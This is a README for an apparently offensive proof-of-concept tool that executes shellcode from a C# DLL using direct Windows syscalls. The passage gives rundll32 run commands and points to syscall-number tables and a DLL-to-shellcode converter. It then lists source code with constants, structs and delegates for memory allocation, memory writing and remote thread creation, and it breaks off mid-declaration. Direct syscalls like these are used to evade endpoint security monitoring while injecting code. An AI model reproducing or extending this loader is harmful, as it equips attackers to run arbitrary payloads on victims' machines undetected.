└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # ExecuteShellcodeWithSyscalls 2 | Execute shellcode with syscalls from C# .dll 3 | 4 | Compile with csc.exe (https://github.com/mobdk/compilecs) and insert entrypoint exec. As time writing this support Windows 10 1803/17134 1809/17763 1903/18362 1909/18363, servers can be added. 5 | 6 | For finding syscalls identifer goto https://j00ru.vexillium.org/syscalls/nt/64/ 7 | 8 | This PoC execute calc.exe. I recommend https://github.com/monoxgas/sRDI/blob/master/PowerShell/ConvertTo-Shellcode.ps1 for 9 | converting C coded .dll into shellcode, works both with 32/64bit 10 | 11 | Execution example: 12 | 13 | Ordinal number: 14 | rundll32 syscalls.dll,#1 15 | 16 | Entrypoint exec: 17 | rundll32 syscalls.dll,exec 18 | 19 | syscalls.cs: 20 | 21 | ``` 22 | 23 | using System; 24 | using System.Security; 25 | using System.Diagnostics; 26 | using System.Runtime.InteropServices; 27 | using System.Runtime.ConstrainedExecution; 28 | using System.Management; 29 | using System.Security.Principal; 30 | using System.Collections.Generic; 31 | using System.ComponentModel; 32 | using System.Security.Permissions; 33 | using Microsoft.Win32.SafeHandles; 34 | using System.Linq; 35 | using System.Reflection; 36 | using System.Security.AccessControl; 37 | using System.Text; 38 | using System.Threading; 39 | 40 | 41 | 42 | 43 | public class Code 44 | { 45 | 46 | public const uint MEM_COMMIT = 0x00001000; 47 | public const uint MEM_RESERVE = 0x00002000; 48 | public const uint PAGE_EXECUTE_READWRITE = 0x40; 49 | public const int FILE_READ_DATA = 0x0001; 50 | public const int FILE_LIST_DIRECTORY = 0x0001; 51 | public const int FILE_WRITE_DATA = 0x0002; 52 | public const int FILE_ADD_FILE = 0x0002; 53 | public const int FILE_APPEND_DATA = 0x0004; 54 | public const int FILE_ADD_SUBDIRECTORY = 0x0004; 55 | public const int FILE_CREATE_PIPE_INSTANCE = 0x0004; 56 | public const int FILE_READ_EA = 0x0008; 57 | public const int FILE_WRITE_EA = 0x0010; 58 | public const int FILE_EXECUTE = 0x0020; 59 | public const int FILE_TRAVERSE = 0x0020; 60 | public const int FILE_DELETE_CHILD = 0x0040; 61 | public const int FILE_READ_ATTRIBUTES = 0x0080; 62 | public const int FILE_WRITE_ATTRIBUTES = 0x0100; 63 | public const int FILE_OVERWRITE_IF = 0x00000005; 64 | public const int FILE_SYNCHRONOUS_IO_NONALERT = 0x00000020; 65 | public const long READ_CONTROL = 0x00020000; 66 | public const long SYNCHRONIZE = 0x00100000; 67 | public const long STANDARD_RIGHTS_WRITE = READ_CONTROL; 68 | public const long STANDARD_RIGHTS_EXECUTE = READ_CONTROL; 69 | public const long STANDARD_RIGHTS_ALL = 0x001F0000; 70 | public const long SPECIFIC_RIGHTS_ALL = 0x0000FFFF; 71 | public const long FILE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1FF; 72 | public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000; 73 | public const UInt32 STANDARD_RIGHTS_READ = 0x00020000; 74 | public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001; 75 | public const UInt32 TOKEN_DUPLICATE = 0x0002; 76 | public const UInt32 TOKEN_IMPERSONATE = 0x0004; 77 | public const UInt32 TOKEN_QUERY = 0x0008; 78 | public const UInt32 TOKEN_QUERY_SOURCE = 0x0010; 79 | public const UInt32 TOKEN_ADJUST_PRIVILEGES = 0x0020; 80 | public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040; 81 | public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080; 82 | public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100; 83 | public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY); 84 | public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID); 85 | public const UInt32 TOKEN_ALT = (TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY); 86 | public const UInt32 SE_PRIVILEGE_ENABLED = 0x2; 87 | public const long FILE_GENERIC_READ = STANDARD_RIGHTS_READ | FILE_READ_DATA | FILE_READ_ATTRIBUTES | FILE_READ_EA | SYNCHRONIZE; 88 | public const long FILE_GENERIC_WRITE = STANDARD_RIGHTS_WRITE | FILE_WRITE_DATA | FILE_WRITE_ATTRIBUTES | FILE_WRITE_EA | FILE_APPEND_DATA | SYNCHRONIZE; 89 | public const long FILE_GENERIC_EXECUTE = STANDARD_RIGHTS_EXECUTE | FILE_READ_ATTRIBUTES | FILE_EXECUTE | SYNCHRONIZE; 90 | public const int FILE_SHARE_READ = 0x00000001; 91 | public const int FILE_SHARE_WRITE = 0x00000002; 92 | public const int FILE_SHARE_DELETE = 0x00000004; 93 | public const int FILE_ATTRIBUTE_READONLY = 0x00000001; 94 | public const int FILE_ATTRIBUTE_HIDDEN = 0x00000002; 95 | public const int FILE_ATTRIBUTE_SYSTEM = 0x00000004; 96 | public const int FILE_ATTRIBUTE_DIRECTORY = 0x00000010; 97 | public const int FILE_ATTRIBUTE_ARCHIVE = 0x00000020; 98 | public const int FILE_ATTRIBUTE_DEVICE = 0x00000040; 99 | public const int FILE_ATTRIBUTE_NORMAL = 0x00000080; 100 | public const int FILE_ATTRIBUTE_TEMPORARY = 0x00000100; 101 | public const int FILE_ATTRIBUTE_SPARSE_FILE = 0x00000200; 102 | public const int FILE_ATTRIBUTE_REPARSE_POINT = 0x00000400; 103 | public const int FILE_ATTRIBUTE_COMPRESSED = 0x00000800; 104 | public const int FILE_ATTRIBUTE_OFFLINE = 0x00001000; 105 | public const int FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x00002000; 106 | public const int FILE_ATTRIBUTE_ENCRYPTED = 0x00004000; 107 | public const int FILE_NOTIFY_CHANGE_FILE_NAME = 0x00000001; 108 | public const int FILE_NOTIFY_CHANGE_DIR_NAME = 0x00000002; 109 | public const int FILE_NOTIFY_CHANGE_ATTRIBUTES = 0x00000004; 110 | public const int FILE_NOTIFY_CHANGE_SIZE = 0x00000008; 111 | public const int FILE_NOTIFY_CHANGE_LAST_WRITE = 0x00000010; 112 | public const int FILE_NOTIFY_CHANGE_LAST_ACCESS = 0x00000020; 113 | public const int FILE_NOTIFY_CHANGE_CREATION = 0x00000040; 114 | public const int FILE_NOTIFY_CHANGE_SECURITY = 0x00000100; 115 | public const int FILE_ACTION_ADDED = 0x00000001; 116 | public const int FILE_ACTION_REMOVED = 0x00000002; 117 | public const int FILE_ACTION_MODIFIED = 0x00000003; 118 | public const int FILE_ACTION_RENAMED_OLD_NAME = 0x00000004; 119 | public const int FILE_ACTION_RENAMED_NEW_NAME = 0x00000005; 120 | public const int MAILSLOT_NO_MESSAGE = -1; 121 | public const int MAILSLOT_WAIT_FOREVER = -1; 122 | public const int FILE_CASE_SENSITIVE_SEARCH = 0x00000001; 123 | public const int FILE_CASE_PRESERVED_NAMES = 0x00000002; 124 | public const int FILE_UNICODE_ON_DISK = 0x00000004; 125 | public const int FILE_PERSISTENT_ACLS = 0x00000008; 126 | public const int FILE_FILE_COMPRESSION = 0x00000010; 127 | public const int FILE_VOLUME_QUOTAS = 0x00000020; 128 | public const int FILE_SUPPORTS_SPARSE_FILES = 0x00000040; 129 | public const int FILE_SUPPORTS_REPARSE_POINTS = 0x00000080; 130 | public const int FILE_SUPPORTS_REMOTE_STORAGE = 0x00000100; 131 | public const int FILE_VOLUME_IS_COMPRESSED = 0x00008000; 132 | public const int FILE_SUPPORTS_OBJECT_IDS = 0x00010000; 133 | public const int FILE_SUPPORTS_ENCRYPTION = 0x00020000; 134 | public const int FILE_NAMED_STREAMS = 0x00040000; 135 | public const int FILE_READ_ONLY_VOLUME = 0x00080000; 136 | public const int CREATE_ALWAYS = 2; 137 | public const uint GENERIC_ALL = 0x1FFFFF; 138 | const int PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = 0x00020007; 139 | const long PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000; 140 | const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000; 141 | 142 | [StructLayout(LayoutKind.Sequential, Pack = 4)] 143 | public struct NtCreateThreadExBuffer 144 | { 145 | public int Size; 146 | public uint Unknown1; 147 | public uint Unknown2; 148 | public IntPtr Unknown3; 149 | public uint Unknown4; 150 | public uint Unknown5; 151 | public uint Unknown6; 152 | public IntPtr Unknown7; 153 | public uint Unknown8; 154 | }; 155 | 156 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 157 | public struct OSVERSIONINFOEXW 158 | { 159 | public int dwOSVersionInfoSize; 160 | public int dwMajorVersion; 161 | public int dwMinorVersion; 162 | public int dwBuildNumber; 163 | public int dwPlatformId; 164 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)] 165 | public string szCSDVersion; 166 | public UInt16 wServicePackMajor; 167 | public UInt16 wServicePackMinor; 168 | public UInt16 wSuiteMask; 169 | public byte wProductType; 170 | public byte wReserved; 171 | } 172 | 173 | [StructLayout(LayoutKind.Sequential)] 174 | public struct LARGE_INTEGER 175 | { 176 | public UInt32 LowPart; 177 | public UInt32 HighPart; 178 | } 179 | 180 | [StructLayout(LayoutKind.Sequential)] 181 | public struct SYSTEM_INFO 182 | { 183 | public uint dwOem; 184 | public uint dwPageSize; 185 | public IntPtr lpMinAppAddress; 186 | public IntPtr lpMaxAppAddress; 187 | public IntPtr dwActiveProcMask; 188 | public uint dwNumProcs; 189 | public uint dwProcType; 190 | public uint dwAllocGranularity; 191 | public ushort wProcLevel; 192 | public ushort wProcRevision; 193 | } 194 | 195 | [Flags] 196 | public enum ProcessAccessFlags : uint 197 | { 198 | All = 0x001F0FFF, 199 | Terminate = 0x00000001, 200 | CreateThread = 0x00000002, 201 | VirtualMemoryOperation = 0x00000008, 202 | VirtualMemoryRead = 0x00000010, 203 | VirtualMemoryWrite = 0x00000020, 204 | DuplicateHandle = 0x00000040, 205 | CreateProcess = 0x000000080, 206 | SetQuota = 0x00000100, 207 | SetInformation = 0x00000200, 208 | QueryInformation = 0x00000400, 209 | QueryLimitedInformation = 0x00001000, 210 | Synchronize = 0x00100000 211 | } 212 | 213 | [StructLayout(LayoutKind.Sequential)] 214 | public struct OBJECT_ATTRIBUTES 215 | { 216 | public ulong Length; 217 | public IntPtr RootDirectory; 218 | public IntPtr ObjectName; 219 | public ulong Attributes; 220 | public IntPtr SecurityDescriptor; 221 | public IntPtr SecurityQualityOfService; 222 | } 223 | 224 | public struct CLIENT_ID 225 | { 226 | public IntPtr UniqueProcess; 227 | public IntPtr UniqueThread; 228 | } 229 | 230 | public enum NTSTATUS : uint 231 | { 232 | Success = 0x00000000, 233 | Wait0 = 0x00000000, 234 | Wait1 = 0x00000001, 235 | Wait2 = 0x00000002, 236 | Wait3 = 0x00000003, 237 | Wait63 = 0x0000003f, 238 | Abandoned = 0x00000080, 239 | AbandonedWait0 = 0x00000080, 240 | AbandonedWait1 = 0x00000081, 241 | AbandonedWait2 = 0x00000082, 242 | AbandonedWait3 = 0x00000083, 243 | AbandonedWait63 = 0x000000bf, 244 | UserApc = 0x000000c0, 245 | KernelApc = 0x00000100, 246 | Alerted = 0x00000101, 247 | Timeout = 0x00000102, 248 | Pending = 0x00000103, 249 | Reparse = 0x00000104, 250 | MoreEntries = 0x00000105, 251 | NotAllAssigned = 0x00000106, 252 | SomeNotMapped = 0x00000107, 253 | OpLockBreakInProgress = 0x00000108, 254 | VolumeMounted = 0x00000109, 255 | RxActCommitted = 0x0000010a, 256 | NotifyCleanup = 0x0000010b, 257 | NotifyEnumDir = 0x0000010c, 258 | NoQuotasForAccount = 0x0000010d, 259 | PrimaryTransportConnectFailed = 0x0000010e, 260 | PageFaultTransition = 0x00000110, 261 | PageFaultDemandZero = 0x00000111, 262 | PageFaultCopyOnWrite = 0x00000112, 263 | PageFaultGuardPage = 0x00000113, 264 | PageFaultPagingFile = 0x00000114, 265 | CrashDump = 0x00000116, 266 | ReparseObject = 0x00000118, 267 | NothingToTerminate = 0x00000122, 268 | ProcessNotInJob = 0x00000123, 269 | ProcessInJob = 0x00000124, 270 | ProcessCloned = 0x00000129, 271 | FileLockedWithOnlyReaders = 0x0000012a, 272 | FileLockedWithWriters = 0x0000012b, 273 | Informational = 0x40000000, 274 | ObjectNameExists = 0x40000000, 275 | ThreadWasSuspended = 0x40000001, 276 | WorkingSetLimitRange = 0x40000002, 277 | ImageNotAtBase = 0x40000003, 278 | RegistryRecovered = 0x40000009, 279 | Warning = 0x80000000, 280 | GuardPageViolation = 0x80000001, 281 | DatatypeMisalignment = 0x80000002, 282 | Breakpoint = 0x80000003, 283 | SingleStep = 0x80000004, 284 | BufferOverflow = 0x80000005, 285 | NoMoreFiles = 0x80000006, 286 | HandlesClosed = 0x8000000a, 287 | PartialCopy = 0x8000000d, 288 | DeviceBusy = 0x80000011, 289 | InvalidEaName = 0x80000013, 290 | EaListInconsistent = 0x80000014, 291 | NoMoreEntries = 0x8000001a, 292 | LongJump = 0x80000026, 293 | DllMightBeInsecure = 0x8000002b, 294 | Error = 0xc0000000, 295 | Unsuccessful = 0xc0000001, 296 | NotImplemented = 0xc0000002, 297 | InvalidInfoClass = 0xc0000003, 298 | InfoLengthMismatch = 0xc0000004, 299 | AccessViolation = 0xc0000005, 300 | InPageError = 0xc0000006, 301 | PagefileQuota = 0xc0000007, 302 | InvalidHandle = 0xc0000008, 303 | BadInitialStack = 0xc0000009, 304 | BadInitialPc = 0xc000000a, 305 | InvalidCid = 0xc000000b, 306 | TimerNotCanceled = 0xc000000c, 307 | InvalidParameter = 0xc000000d, 308 | NoSuchDevice = 0xc000000e, 309 | NoSuchFile = 0xc000000f, 310 | InvalidDeviceRequest = 0xc0000010, 311 | EndOfFile = 0xc0000011, 312 | WrongVolume = 0xc0000012, 313 | NoMediaInDevice = 0xc0000013, 314 | NoMemory = 0xc0000017, 315 | ConflictingAddresses = 0xc0000018, 316 | NotMappedView = 0xc0000019, 317 | UnableToFreeVm = 0xc000001a, 318 | UnableToDeleteSection = 0xc000001b, 319 | IllegalInstruction = 0xc000001d, 320 | AlreadyCommitted = 0xc0000021, 321 | AccessDenied = 0xc0000022, 322 | BufferTooSmall = 0xc0000023, 323 | ObjectTypeMismatch = 0xc0000024, 324 | NonContinuableException = 0xc0000025, 325 | BadStack = 0xc0000028, 326 | NotLocked = 0xc000002a, 327 | NotCommitted = 0xc000002d, 328 | InvalidParameterMix = 0xc0000030, 329 | ObjectNameInvalid = 0xc0000033, 330 | ObjectNameNotFound = 0xc0000034, 331 | ObjectNameCollision = 0xc0000035, 332 | ObjectPathInvalid = 0xc0000039, 333 | ObjectPathNotFound = 0xc000003a, 334 | ObjectPathSyntaxBad = 0xc000003b, 335 | DataOverrun = 0xc000003c, 336 | DataLate = 0xc000003d, 337 | DataError = 0xc000003e, 338 | CrcError = 0xc000003f, 339 | SectionTooBig = 0xc0000040, 340 | PortConnectionRefused = 0xc0000041, 341 | InvalidPortHandle = 0xc0000042, 342 | SharingViolation = 0xc0000043, 343 | QuotaExceeded = 0xc0000044, 344 | InvalidPageProtection = 0xc0000045, 345 | MutantNotOwned = 0xc0000046, 346 | SemaphoreLimitExceeded = 0xc0000047, 347 | PortAlreadySet = 0xc0000048, 348 | SectionNotImage = 0xc0000049, 349 | SuspendCountExceeded = 0xc000004a, 350 | ThreadIsTerminating = 0xc000004b, 351 | BadWorkingSetLimit = 0xc000004c, 352 | IncompatibleFileMap = 0xc000004d, 353 | SectionProtection = 0xc000004e, 354 | EasNotSupported = 0xc000004f, 355 | EaTooLarge = 0xc0000050, 356 | NonExistentEaEntry = 0xc0000051, 357 | NoEasOnFile = 0xc0000052, 358 | EaCorruptError = 0xc0000053, 359 | FileLockConflict = 0xc0000054, 360 | LockNotGranted = 0xc0000055, 361 | DeletePending = 0xc0000056, 362 | CtlFileNotSupported = 0xc0000057, 363 | UnknownRevision = 0xc0000058, 364 | RevisionMismatch = 0xc0000059, 365 | InvalidOwner = 0xc000005a, 366 | InvalidPrimaryGroup = 0xc000005b, 367 | NoImpersonationToken = 0xc000005c, 368 | CantDisableMandatory = 0xc000005d, 369 | NoLogonServers = 0xc000005e, 370 | NoSuchLogonSession = 0xc000005f, 371 | NoSuchPrivilege = 0xc0000060, 372 | PrivilegeNotHeld = 0xc0000061, 373 | InvalidAccountName = 0xc0000062, 374 | UserExists = 0xc0000063, 375 | NoSuchUser = 0xc0000064, 376 | GroupExists = 0xc0000065, 377 | NoSuchGroup = 0xc0000066, 378 | MemberInGroup = 0xc0000067, 379 | MemberNotInGroup = 0xc0000068, 380 | LastAdmin = 0xc0000069, 381 | WrongPassword = 0xc000006a, 382 | IllFormedPassword = 0xc000006b, 383 | PasswordRestriction = 0xc000006c, 384 | LogonFailure = 0xc000006d, 385 | AccountRestriction = 0xc000006e, 386 | InvalidLogonHours = 0xc000006f, 387 | InvalidWorkstation = 0xc0000070, 388 | PasswordExpired = 0xc0000071, 389 | AccountDisabled = 0xc0000072, 390 | NoneMapped = 0xc0000073, 391 | TooManyLuidsRequested = 0xc0000074, 392 | LuidsExhausted = 0xc0000075, 393 | InvalidSubAuthority = 0xc0000076, 394 | InvalidAcl = 0xc0000077, 395 | InvalidSid = 0xc0000078, 396 | InvalidSecurityDescr = 0xc0000079, 397 | ProcedureNotFound = 0xc000007a, 398 | InvalidImageFormat = 0xc000007b, 399 | NoToken = 0xc000007c, 400 | BadInheritanceAcl = 0xc000007d, 401 | RangeNotLocked = 0xc000007e, 402 | DiskFull = 0xc000007f, 403 | ServerDisabled = 0xc0000080, 404 | ServerNotDisabled = 0xc0000081, 405 | TooManyGuidsRequested = 0xc0000082, 406 | GuidsExhausted = 0xc0000083, 407 | InvalidIdAuthority = 0xc0000084, 408 | AgentsExhausted = 0xc0000085, 409 | InvalidVolumeLabel = 0xc0000086, 410 | SectionNotExtended = 0xc0000087, 411 | NotMappedData = 0xc0000088, 412 | ResourceDataNotFound = 0xc0000089, 413 | ResourceTypeNotFound = 0xc000008a, 414 | ResourceNameNotFound = 0xc000008b, 415 | ArrayBoundsExceeded = 0xc000008c, 416 | FloatDenormalOperand = 0xc000008d, 417 | FloatDivideByZero = 0xc000008e, 418 | FloatInexactResult = 0xc000008f, 419 | FloatInvalidOperation = 0xc0000090, 420 | FloatOverflow = 0xc0000091, 421 | FloatStackCheck = 0xc0000092, 422 | FloatUnderflow = 0xc0000093, 423 | IntegerDivideByZero = 0xc0000094, 424 | IntegerOverflow = 0xc0000095, 425 | PrivilegedInstruction = 0xc0000096, 426 | TooManyPagingFiles = 0xc0000097, 427 | FileInvalid = 0xc0000098, 428 | InstanceNotAvailable = 0xc00000ab, 429 | PipeNotAvailable = 0xc00000ac, 430 | InvalidPipeState = 0xc00000ad, 431 | PipeBusy = 0xc00000ae, 432 | IllegalFunction = 0xc00000af, 433 | PipeDisconnected = 0xc00000b0, 434 | PipeClosing = 0xc00000b1, 435 | PipeConnected = 0xc00000b2, 436 | PipeListening = 0xc00000b3, 437 | InvalidReadMode = 0xc00000b4, 438 | IoTimeout = 0xc00000b5, 439 | FileForcedClosed = 0xc00000b6, 440 | ProfilingNotStarted = 0xc00000b7, 441 | ProfilingNotStopped = 0xc00000b8, 442 | NotSameDevice = 0xc00000d4, 443 | FileRenamed = 0xc00000d5, 444 | CantWait = 0xc00000d8, 445 | PipeEmpty = 0xc00000d9, 446 | CantTerminateSelf = 0xc00000db, 447 | InternalError = 0xc00000e5, 448 | InvalidParameter1 = 0xc00000ef, 449 | InvalidParameter2 = 0xc00000f0, 450 | InvalidParameter3 = 0xc00000f1, 451 | InvalidParameter4 = 0xc00000f2, 452 | InvalidParameter5 = 0xc00000f3, 453 | InvalidParameter6 = 0xc00000f4, 454 | InvalidParameter7 = 0xc00000f5, 455 | InvalidParameter8 = 0xc00000f6, 456 | InvalidParameter9 = 0xc00000f7, 457 | InvalidParameter10 = 0xc00000f8, 458 | InvalidParameter11 = 0xc00000f9, 459 | InvalidParameter12 = 0xc00000fa, 460 | MappedFileSizeZero = 0xc000011e, 461 | TooManyOpenedFiles = 0xc000011f, 462 | Cancelled = 0xc0000120, 463 | CannotDelete = 0xc0000121, 464 | InvalidComputerName = 0xc0000122, 465 | FileDeleted = 0xc0000123, 466 | SpecialAccount = 0xc0000124, 467 | SpecialGroup = 0xc0000125, 468 | SpecialUser = 0xc0000126, 469 | MembersPrimaryGroup = 0xc0000127, 470 | FileClosed = 0xc0000128, 471 | TooManyThreads = 0xc0000129, 472 | ThreadNotInProcess = 0xc000012a, 473 | TokenAlreadyInUse = 0xc000012b, 474 | PagefileQuotaExceeded = 0xc000012c, 475 | CommitmentLimit = 0xc000012d, 476 | InvalidImageLeFormat = 0xc000012e, 477 | InvalidImageNotMz = 0xc000012f, 478 | InvalidImageProtect = 0xc0000130, 479 | InvalidImageWin16 = 0xc0000131, 480 | LogonServer = 0xc0000132, 481 | DifferenceAtDc = 0xc0000133, 482 | SynchronizationRequired = 0xc0000134, 483 | DllNotFound = 0xc0000135, 484 | IoPrivilegeFailed = 0xc0000137, 485 | OrdinalNotFound = 0xc0000138, 486 | EntryPointNotFound = 0xc0000139, 487 | ControlCExit = 0xc000013a, 488 | PortNotSet = 0xc0000353, 489 | DebuggerInactive = 0xc0000354, 490 | CallbackBypass = 0xc0000503, 491 | PortClosed = 0xc0000700, 492 | MessageLost = 0xc0000701, 493 | InvalidMessage = 0xc0000702, 494 | RequestCanceled = 0xc0000703, 495 | RecursiveDispatch = 0xc0000704, 496 | LpcReceiveBufferExpected = 0xc0000705, 497 | LpcInvalidConnectionUsage = 0xc0000706, 498 | LpcRequestsNotAllowed = 0xc0000707, 499 | ResourceInUse = 0xc0000708, 500 | ProcessIsProtected = 0xc0000712, 501 | VolumeDirty = 0xc0000806, 502 | FileCheckedOut = 0xc0000901, 503 | CheckOutRequired = 0xc0000902, 504 | BadFileType = 0xc0000903, 505 | FileTooLarge = 0xc0000904, 506 | FormsAuthRequired = 0xc0000905, 507 | VirusInfected = 0xc0000906, 508 | VirusDeleted = 0xc0000907, 509 | TransactionalConflict = 0xc0190001, 510 | InvalidTransaction = 0xc0190002, 511 | TransactionNotActive = 0xc0190003, 512 | TmInitializationFailed = 0xc0190004, 513 | RmNotActive = 0xc0190005, 514 | RmMetadataCorrupt = 0xc0190006, 515 | TransactionNotJoined = 0xc0190007, 516 | DirectoryNotRm = 0xc0190008, 517 | CouldNotResizeLog = 0xc0190009, 518 | TransactionsUnsupportedRemote = 0xc019000a, 519 | LogResizeInvalidSize = 0xc019000b, 520 | RemoteFileVersionMismatch = 0xc019000c, 521 | CrmProtocolAlreadyExists = 0xc019000f, 522 | TransactionPropagationFailed = 0xc0190010, 523 | CrmProtocolNotFound = 0xc0190011, 524 | TransactionSuperiorExists = 0xc0190012, 525 | TransactionRequestNotValid = 0xc0190013, 526 | TransactionNotRequested = 0xc0190014, 527 | TransactionAlreadyAborted = 0xc0190015, 528 | TransactionAlreadyCommitted = 0xc0190016, 529 | TransactionInvalidMarshallBuffer = 0xc0190017, 530 | CurrentTransactionNotValid = 0xc0190018, 531 | LogGrowthFailed = 0xc0190019, 532 | ObjectNoLongerExists = 0xc0190021, 533 | StreamMiniversionNotFound = 0xc0190022, 534 | StreamMiniversionNotValid = 0xc0190023, 535 | MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024, 536 | CantOpenMiniversionWithModifyIntent = 0xc0190025, 537 | CantCreateMoreStreamMiniversions = 0xc0190026, 538 | HandleNoLongerValid = 0xc0190028, 539 | NoTxfMetadata = 0xc0190029, 540 | LogCorruptionDetected = 0xc0190030, 541 | CantRecoverWithHandleOpen = 0xc0190031, 542 | RmDisconnected = 0xc0190032, 543 | EnlistmentNotSuperior = 0xc0190033, 544 | RecoveryNotNeeded = 0xc0190034, 545 | RmAlreadyStarted = 0xc0190035, 546 | FileIdentityNotPersistent = 0xc0190036, 547 | CantBreakTransactionalDependency = 0xc0190037, 548 | CantCrossRmBoundary = 0xc0190038, 549 | TxfDirNotEmpty = 0xc0190039, 550 | IndoubtTransactionsExist = 0xc019003a, 551 | TmVolatile = 0xc019003b, 552 | RollbackTimerExpired = 0xc019003c, 553 | TxfAttributeCorrupt = 0xc019003d, 554 | EfsNotAllowedInTransaction = 0xc019003e, 555 | TransactionalOpenNotAllowed = 0xc019003f, 556 | TransactedMappingUnsupportedRemote = 0xc0190040, 557 | TxfMetadataAlreadyPresent = 0xc0190041, 558 | TransactionScopeCallbacksNotSet = 0xc0190042, 559 | TransactionRequiredPromotion = 0xc0190043, 560 | CannotExecuteFileInTransaction = 0xc0190044, 561 | TransactionsNotFrozen = 0xc0190045, 562 | MaximumNtStatus = 0xffffffff 563 | }; 564 | 565 | [Flags] 566 | public enum MemoryProtection : uint 567 | { 568 | AccessDenied = 0x0, 569 | Execute = 0x10, 570 | ExecuteRead = 0x20, 571 | ExecuteReadWrite = 0x40, 572 | ExecuteWriteCopy = 0x80, 573 | Guard = 0x100, 574 | NoCache = 0x200, 575 | WriteCombine = 0x400, 576 | NoAccess = 0x01, 577 | ReadOnly = 0x02, 578 | ReadWrite = 0x04, 579 | WriteCopy = 0x08, 580 | //SEC_NO_CHANGE = 0x00400000 581 | } 582 | 583 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 584 | struct STARTUPINFO 585 | { 586 | public Int32 cb; 587 | public string lpReserved; 588 | public string lpDesktop; 589 | public string lpTitle; 590 | public Int32 dwX; 591 | public Int32 dwY; 592 | public Int32 dwXSize; 593 | public Int32 dwYSize; 594 | public Int32 dwXCountChars; 595 | public Int32 dwYCountChars; 596 | public Int32 dwFillAttribute; 597 | public Int32 dwFlags; 598 | public Int16 wShowWindow; 599 | public Int16 cbReserved2; 600 | public IntPtr lpReserved2; 601 | public IntPtr hStdInput; 602 | public IntPtr hStdOutput; 603 | public IntPtr hStdError; 604 | } 605 | 606 | [StructLayout(LayoutKind.Sequential)] 607 | internal struct PROCESS_INFORMATION 608 | { 609 | public IntPtr hProcess; 610 | public IntPtr hThread; 611 | public int dwProcessId; 612 | public int dwThreadId; 613 | } 614 | 615 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 616 | struct STARTUPINFOEX 617 | { 618 | public STARTUPINFO StartupInfo; 619 | public IntPtr lpAttributeList; 620 | } 621 | 622 | [DllImport("kernel32.dll", SetLastError = true)] 623 | [ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)] 624 | [SuppressUnmanagedCodeSecurity] 625 | [return: MarshalAs(UnmanagedType.Bool)] 626 | public static extern bool CloseHandle(IntPtr hObject); 627 | 628 | [DllImport("ntdll.dll", SetLastError = true)] 629 | public static extern bool ZwOpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle); 630 | 631 | [SuppressUnmanagedCodeSecurity] 632 | [DllImport("ntdll.dll", SetLastError = true)] 633 | private static extern NTSTATUS RtlGetVersion(ref OSVERSIONINFOEXW versionInfo); 634 | 635 | [DllImport("ntdll.dll")] 636 | public static extern NTSTATUS ZwProtectVirtualMemory( [In] IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, [In] MemoryProtection NewProtect, [Out] out MemoryProtection OldProtect ); 637 | 638 | [DllImport("kernel32.dll", SetLastError = true)] 639 | [return: MarshalAs(UnmanagedType.Bool)] 640 | private static extern bool InitializeProcThreadAttributeList( IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize); 641 | 642 | [DllImport("kernel32.dll", SetLastError = true)] 643 | [return: MarshalAs(UnmanagedType.Bool)] 644 | private static extern bool UpdateProcThreadAttribute( IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize); 645 | 646 | [SuppressUnmanagedCodeSecurity] 647 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 648 | public delegate NTSTATUS ZwOpenProcessX(out IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid); 649 | 650 | [SuppressUnmanagedCodeSecurity] 651 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 652 | public delegate NTSTATUS ZwWriteVirtualMemoryX(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten); 653 | 654 | [SuppressUnmanagedCodeSecurity] 655 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 656 | public delegate NTSTATUS ZwAllocateVirtualMemoryX(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect); 657 | 658 | [SuppressUnmanagedCodeSecurity] 659 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 660 | public delegate NTSTATUS ZwCreateThreadExX(out IntPtr threadHandle,uint desiredAccess,IntPtr objectAttributes,IntPtr processHandle,IntPtr lpStartAddress,IntPtr lpParameter,int createSuspended,uint stackZeroBits,uint sizeOfStackCommit,uint sizeOfStackReserve,IntPtr lpBytesBuffer); 661 | 662 | [SuppressUnmanagedCodeSecurity] 663 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 664 | public delegate NTSTATUS ZwCreateSectionX(ref IntPtr section, uint desiredAccess, IntPtr 